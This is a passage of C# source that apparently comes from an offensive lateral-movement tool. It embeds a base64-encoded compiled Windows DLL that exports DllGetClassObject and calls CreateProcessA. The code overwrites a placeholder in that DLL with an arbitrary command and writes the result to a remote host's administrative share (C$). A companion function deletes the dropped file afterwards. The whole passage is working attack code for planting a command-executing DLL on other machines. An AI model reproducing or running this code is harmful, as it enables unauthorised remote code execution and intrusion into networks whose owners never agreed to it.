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ACAAAAAgAqEwAALmRlYnVnX2FyYW5nZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfZnJhbWUALmRlYnVnX3N0cgBwcmVfY19pbml0AGF0ZXhpdF90YWJsZQBfQ1JUX0lOSVQAX19wcm9jX2F0dGFjaGVkAC5yZGF0YSQucmVmcHRyLl9fbmF0aXZlX3N0YXJ0dXBfbG9jawAucmRhdGEkLnJlZnB0ci5fX25hdGl2ZV9zdGFydHVwX3N0YXRlAC5yZGF0YSQucmVmcHRyLl9fZHluX3Rsc19pbml0X2NhbGxiYWNrAC5yZGF0YSQucmVmcHRyLl9feGlfegAucmRhdGEkLnJlZnB0ci5fX3hpX2EALnJkYXRhJC5yZWZwdHIuX194Y196AC5yZGF0YSQucmVmcHRyLl9feGNfYQBfX0RsbE1haW5DUlRTdGFydHVwAC5yZGF0YSQucmVmcHRyLl9fbmF0aXZlX2RsbG1haW5fcmVhc29uAERsbE1haW5DUlRTdGFydHVwAC5yZGF0YSQucmVmcHRyLm1pbmd3X2FwcF90eXBlAC5DUlQkWElBQQBfX2djY19yZWdpc3Rlcl9mcmFtZQBfX2djY19kZXJlZ2lzdGVyX2ZyYW1lAERsbEdldENsYXNzT2JqZWN0AC5yZGF0YSR6enoAX19kb19nbG9iYWxfZHRvcnMAX19kb19nbG9iYWxfY3RvcnMALnJkYXRhJC5yZWZwdHIuX19DVE9SX0xJU1RfXwBpbml0aWFsaXplZABfX3NlY3VyaXR5X2luaXRfY29va2llAC5kYXRhJF9fc2VjdXJpdHlfY29va2llAC5kYXRhJF9fc2VjdXJpdHlfY29va2llX2NvbXBsZW1lbnQAX19yZXBvcnRfZ3NmYWlsdXJlAEdTX0NvbnRleHRSZWNvcmQAR1NfRXhjZXB0aW9uUmVjb3JkAEdTX0V4Y2VwdGlvblBvaW50ZXJzAF9fZHluX3Rsc19kdG9yAF9fZHluX3Rsc19pbml0AC5yZGF0YSQucmVmcHRyLl9DUlRfTVQAX190bHJlZ2R0b3IAX2RlY29kZV9wb2ludGVyAF9lbmNvZGVfcG9pbnRlcgBfX3JlcG9ydF9lcnJvcgBfX3dyaXRlX21lbW9yeS5wYXJ0LjAAbWF4U2VjdGlvbnMAX3BlaTM4Nl9ydW50aW1lX3JlbG9jYXRvcgB3YXNfaW5pdC45NTE3NAAucmRhdGEkLnJlZnB0ci5fX1JVTlRJTUVfUFNFVURPX1JFTE9DX0xJU1RfRU5EX18ALnJkYXRhJC5yZWZwdHIuX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX18ALnJkYXRhJC5yZWZwdHIuX19pbWFnZV9iYXNlX18ALnRleHQudW5saWtlbHkALnhkYXRhLnVubGlrZWx5AC5wZGF0YS51bmxpa2VseQBfX21pbmd3X1NFSF9lcnJvcl9oYW5kbGVyAF9fbWluZ3dfaW5pdF9laGFuZGxlcgB3YXNfaGVyZS45NTAxMwBlbXVfcGRhdGEAZW11X3hkYXRhAF9nbnVfZXhjZXB0aW9uX2hhbmRsZXIAX19taW5nd3Rocl9ydW5fa2V5X2R0b3JzLnBhcnQuMABfX21pbmd3dGhyX2NzAGtleV9kdG9yX2xpc3QAX19fdzY0X21pbmd3dGhyX2FkZF9rZXlfZHRvcgBfX21pbmd3dGhyX2NzX2luaXQAX19fdzY0X21pbmd3dGhyX3JlbW92ZV9rZXlfZHRvcgBfX21pbmd3X1RMU2NhbGxiYWNrAHBzZXVkby1yZWxvYy1saXN0LmMAX1ZhbGlkYXRlSW1hZ2VCYXNlLnBhcnQuMABfVmFsaWRhdGVJbWFnZUJhc2UAX0ZpbmRQRVNlY3Rpb24AX0ZpbmRQRVNlY3Rpb25CeU5hbWUAX19taW5nd19HZXRTZWN0aW9uRm9yQWRkcmVzcwBfX21pbmd3X0dldFNlY3Rpb25Db3VudABfRmluZFBFU2VjdGlvbkV4ZWMAX0dldFBFSW1hZ2VCYXNlAF9Jc05vbndyaXRhYmxlSW5DdXJyZW50SW1hZ2UAX19taW5nd19lbnVtX2ltcG9ydF9saWJyYXJ5X25hbWVzAC5kZWJ1Z19pbmZvAC5kZWJ1Z19hYmJyZXYALmRlYnVnX2xpbmUALmRlYnVnX2FyYW5nZXMALmRlYnVnX3N0cgAuZGVidWdfZnJhbWUARGxsRW50cnlQb2ludABfaW5pdGlhbGl6ZV9vbmV4aXRfdGFibGUAX3JlZ2lzdGVyX29uZXhpdF9mdW5jdGlvbgBfZXhlY3V0ZV9vbmV4aXRfdGFibGUAX19hY3J0X2lvYl9mdW5jAHJlZ2lzdGVyX2ZyYW1lX2N0b3IALnRleHQuc3RhcnR1cAAueGRhdGEuc3RhcnR1cAAucGRhdGEuc3RhcnR1cAAuY3RvcnMuNjU1MzUAX19fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9fAF9faW1wX2Fib3J0AF9fbGliNjRfbGlia2VybmVsMzJfYV9pbmFtZQBfX2RhdGFfc3RhcnRfXwBfX19EVE9SX0xJU1RfXwBfX2ltcF9fbG9jawBfX2ltcF9SdGxWaXJ0dWFsVW53aW5kAFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgBfX2ltcF9jYWxsb2MAX19fdGxzX3N0YXJ0X18ALnJlZnB0ci5fX25hdGl2ZV9zdGFydHVwX3N0YXRlAF9fSW1hZ2VCYXNlAEdldExhc3RFcnJvcgBHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBtaW5nd19pbml0bHRzc3VvX2ZvcmNlAF9fcnRfcHNyZWxvY3Nfc3RhcnQAX19kbGxfY2hhcmFjdGVyaXN0aWNzX18AX19zaXplX29mX3N0YWNrX2NvbW1pdF9fAF9faW9iX2Z1bmMAX19zaXplX29mX3N0YWNrX3Jlc2VydmVfXwBfX21ham9yX3N1YnN5c3RlbV92ZXJzaW9uX18AX19fY3J0X3hsX3N0YXJ0X18AX19pbXBfRGVsZXRlQ3JpdGljYWxTZWN0aW9uAC5yZWZwdHIuX19DVE9SX0xJU1RfXwBWaXJ0dWFsUXVlcnkAX19fY3J0X3hpX3N0YXJ0X18AX19pbXBfX2Ftc2dfZXhpdABfX19jcnRfeGlfZW5kX18AX3Rsc19zdGFydAAucmVmcHRyLl9fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9fAF9fbWluZ3dfb2xkZXhjcHRfaGFuZGxlcgBfX2ltcF9HZXRDdXJyZW50VGhyZWFkSWQAQ3JlYXRlUHJvY2Vzc0EAR2V0Q3VycmVudFByb2Nlc3NJZABUbHNHZXRWYWx1ZQBUZXJtaW5hdGVQcm9jZXNzAF9fYnNzX3N0YXJ0X18AX19fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9FTkRfXwBSdGxMb29rdXBGdW5jdGlvbkVudHJ5AF9fc2l6ZV9vZl9oZWFwX2NvbW1pdF9fAF9faW1wX0dldExhc3RFcnJvcgBfX2ltcF9mcmVlAF9faW1wX1J0bExvb2t1cEZ1bmN0aW9uRW50cnkAVmlydHVhbFByb3RlY3QAbWluZ3dfYXBwX3R5cGUAX19fY3J0X3hwX3N0YXJ0X18AX19pbXBfTGVhdmVDcml0aWNhbFNlY3Rpb24AX19pbXBfR2V0VGlja0NvdW50AC5yZWZwdHIuX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX0VORF9fAF9fX2NydF94cF9lbmRfXwBfX2ltcF9DbG9zZUhhbmRsZQBfX21pbm9yX29zX3ZlcnNpb25fXwBfX2ltcF9HZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBFbnRlckNyaXRpY2FsU2VjdGlvbgBfX2ltcF9DcmVhdGVQcm9jZXNzQQAucmVmcHRyLl9feGlfYQBfX2ltYWdlX2Jhc2VfXwAucmVmcHRyLl9DUlRfTVQAUnRsQ2FwdHVyZUNvbnRleHQAX19zZWN0aW9uX2FsaWdubWVudF9fAF9fbmF0aXZlX2RsbG1haW5fcmVhc29uAF90bHNfdXNlZABVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAX19JQVRfZW5kX18AX19SVU5USU1FX1BTRVVET19SRUxPQ19MSVNUX18AX19pbXBfUnRsQWRkRnVuY3Rpb25UYWJsZQBfX2RhdGFfZW5kX18AX19pbXBfZndyaXRlAF9fQ1RPUl9MSVNUX18AX2hlYWRfbGliNjRfbGlia2VybmVsMzJfYQBfX2Jzc19lbmRfXwBHZXRUaWNrQ291bnQAX19uYXRpdmVfdmNjbHJpdF9yZWFzb24AX19fY3J0X3hjX2VuZF9fAFJ0bEFkZEZ1bmN0aW9uVGFibGUALnJlZnB0ci5fX25hdGl2ZV9zdGFydHVwX2xvY2sAX19pbXBfRW50ZXJDcml0aWNhbFNlY3Rpb24AX3Rsc19pbmRleABfX25hdGl2ZV9zdGFydHVwX3N0YXRlAF9fX2NydF94Y19zdGFydF9fAF9faW1wX0dldEN1cnJlbnRQcm9jZXNzSWQAX19pbXBfVGVybWluYXRlUHJvY2VzcwBfX2xpYjY0X2xpYm1zdmNydF9vc19hX2luYW1lAF9fX0NUT1JfTElTVF9fAC5yZWZwdHIuX19keW5fdGxzX2luaXRfY2FsbGJhY2sAX19pbXBfc2lnbmFsAF9faW1wX19yZWdpc3Rlcl9vbmV4aXRfZnVuY3Rpb24AX19ydF9wc3JlbG9jc19zaXplAF9faW1wX1F1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyAF9faW1wX3N0cmxlbgBfX2ZpbGVfYWxpZ25tZW50X18AX19pbXBfSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbgBDbG9zZUhhbmRsZQBfX2ltcF9yZWFsbG9jAEluaXRpYWxpemVDcml0aWNhbFNlY3Rpb24AX19pbXBfdmZwcmludGYAX19tYWpvcl9vc192ZXJzaW9uX18AX19JQVRfc3RhcnRfXwBfX2ltcF9VbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAX19pbXBfU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAC5yZWZwdHIubWluZ3dfYXBwX3R5cGUAX19EVE9SX0xJU1RfXwBSdGxWaXJ0dWFsVW53aW5kAF9faW1wX19pbml0aWFsaXplX29uZXhpdF90YWJsZQBfX2ltcF9TbGVlcABMZWF2ZUNyaXRpY2FsU2VjdGlvbgBfX3NpemVfb2ZfaGVhcF9yZXNlcnZlX18AX19fY3J0X3h0X3N0YXJ0X18AX19zdWJzeXN0ZW1fXwBfYW1zZ19leGl0AF9fc2VjdXJpdHlfY29va2llX2NvbXBsZW1lbnQAX19pbXBfVGxzR2V0VmFsdWUAR2V0Q3VycmVudFByb2Nlc3MAX19pbXBfX2V4ZWN1dGVfb25leGl0X3RhYmxlAF9faW1wX1ZpcnR1YWxQcm90ZWN0AF9fX3Rsc19lbmRfXwBRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgBfX2ltcF9WaXJ0dWFsUXVlcnkAX19pbXBfX2luaXR0ZXJtAG1pbmd3X2luaXRsdHNkeW5fZm9yY2UAX19pbXBfX19pb2JfZnVuYwBfX2R5bl90bHNfaW5pdF9jYWxsYmFjawAucmVmcHRyLl9faW1hZ2VfYmFzZV9fAF9pbml0dGVybQBfX2ltcF9zdHJuY21wAF9oZWFkX2xpYjY0X2xpYm1zdmNydF9vc19hAF9faW1wX19fYWNydF9pb2JfZnVuYwBfX21ham9yX2ltYWdlX3ZlcnNpb25fXwBfX2xvYWRlcl9mbGFnc19fAF9fX2Noa3N0a19tcwBfX25hdGl2ZV9zdGFydHVwX2xvY2sALnJlZnB0ci5fX25hdGl2ZV9kbGxtYWluX3JlYXNvbgBHZXRDdXJyZW50VGhyZWFkSWQAX19ydF9wc3JlbG9jc19lbmQAX19taW5vcl9zdWJzeXN0ZW1fdmVyc2lvbl9fAF9fbWlub3JfaW1hZ2VfdmVyc2lvbl9fAF9faW1wX191bmxvY2sAbWluZ3dfaW5pdGx0c2Ryb3RfZm9yY2UALnJlZnB0ci5fX3hjX2EALnJlZnB0ci5fX3hpX3oARGVsZXRlQ3JpdGljYWxTZWN0aW9uAF9faW1wX1J0bENhcHR1cmVDb250ZXh0AF9fUlVOVElNRV9QU0VVRE9fUkVMT0NfTElTVF9FTkRfXwBfX2ltcF9HZXRDdXJyZW50UHJvY2VzcwAucmVmcHRyLl9feGNfegBfX19jcnRfeHRfZW5kX18AX19zZWN1cml0eV9jb29raWUA";
 18 | 
 19 |                 byte[] fileBytes = Convert.FromBase64String(base64Content);
 20 | 
 21 |                 byte[] commandBytes = Encoding.ASCII.GetBytes(command);
 22 | 
 23 |                 for (int i = 0; i < fileBytes.Length - 4; i++)
 24 |                 {
 25 |                     if (fileBytes[i] == (byte)'A' && fileBytes[i + 1] == (byte)'A' &&
 26 |                         fileBytes[i + 2] == (byte)'A' && fileBytes[i + 3] == (byte)'A')
 27 |                     {
 28 |                         for (int j = 0; j < commandBytes.Length && i + j < fileBytes.Length; j++)
 29 |                         {
 30 |                             fileBytes[i + j] = commandBytes[j];
 31 |                         }
 32 | 
 33 |                         if (i + commandBytes.Length < fileBytes.Length)
 34 |                         {
 35 |                             fileBytes[i + commandBytes.Length] = 0x00;
 36 |                         }
 37 | 
 38 |                         break;
 39 |                     }
 40 |                 }
 41 | 
 42 |                 // Check if path contains a drive letter
 43 |                 string uncPath;
 44 |                 if (path.Length >= 2 && path[1] == ':')
 45 |                 {
 46 |                     // Extract drive letter and convert to lowercase
 47 |                     char driveLetter = char.ToLower(path[0]);
 48 | 
 49 |                     // Remove drive letter and colon from path
 50 |                     string remainingPath = path.Substring(2);
 51 | 
 52 |                     // Construct UNC path with administrative share
 53 |                     uncPath = $@"\\{serverName}\{driveLetter}${remainingPath}";
 54 |                 }
 55 |                 else
 56 |                 {
 57 |                     // If no drive letter, use path as is
 58 |                     uncPath = $@"\\{serverName}\{path}";
 59 |                 }
 60 | 
 61 |                 // Create directory if it doesn't exist
 62 |                 string directoryPath = Path.GetDirectoryName(uncPath);
 63 |                 if (!Directory.Exists(directoryPath))
 64 |                 {
 65 |                     Directory.CreateDirectory(directoryPath);
 66 |                 }
 67 | 
 68 |                 // Write the file to the remote location
 69 |                 File.WriteAllBytes(uncPath, fileBytes);
 70 | 
 71 |                 Console.WriteLine($"File successfully written to {uncPath}");
 72 |                 return true;
 73 |             }
 74 |             catch (Exception ex)
 75 |             {
 76 |                 Console.WriteLine($"Error dropping file: {ex.Message}");
 77 |                 return false;
 78 |             }
 79 | 
 80 |         }
 81 | 
 82 |         public static bool RemoveFile(string serverName, string path)
 83 |         {
 84 |             try
 85 |             {
 86 |                 // Check if path contains a drive letter
 87 |                 string uncPath;
 88 |                 if (path.Length >= 2 && path[1] == ':')
 89 |                 {
 90 |                     // Extract drive letter and convert to lowercase
 91 |                     char driveLetter = char.ToLower(path[0]);
 92 | 
 93 |                     // Remove drive letter and colon from path
 94 |                     string remainingPath = path.Substring(2);
 95 | 
 96 |                     // Construct UNC path with administrative share
 97 |                     uncPath = $@"\\{serverName}\{driveLetter}${remainingPath}";
 98 |                 }
 99 |                 else
100 |                 {
101 |                     // If no drive letter, use path as is
102 |                     uncPath = $@"\\{serverName}\{path}";
103 |                 }
104 | 
105 |                 // Check if the file exists
106 |                 if (File.Exists(uncPath))
107 |                 {
108 |                     // Delete the file
109 |                     File.Delete(uncPath);
110 |                     Console.WriteLine($"[+] File {uncPath} successfully deleted.");
111 |                     return true;
112 |                 }
113 |                 else
114 |                 {
115 |                     Console.WriteLine($"[*] File {uncPath} does not exist.");
116 |                     return false;
117 |                 }
118 |             }
119 |             catch (Exception ex)
120 |             {
121 |                 Console.WriteLine($"[-] Error removing file: {ex.Message}");
122 |                 return false;
123 |             }
124 |         }
125 |     }
126 | }
127 | 


--------------------------------------------------------------------------------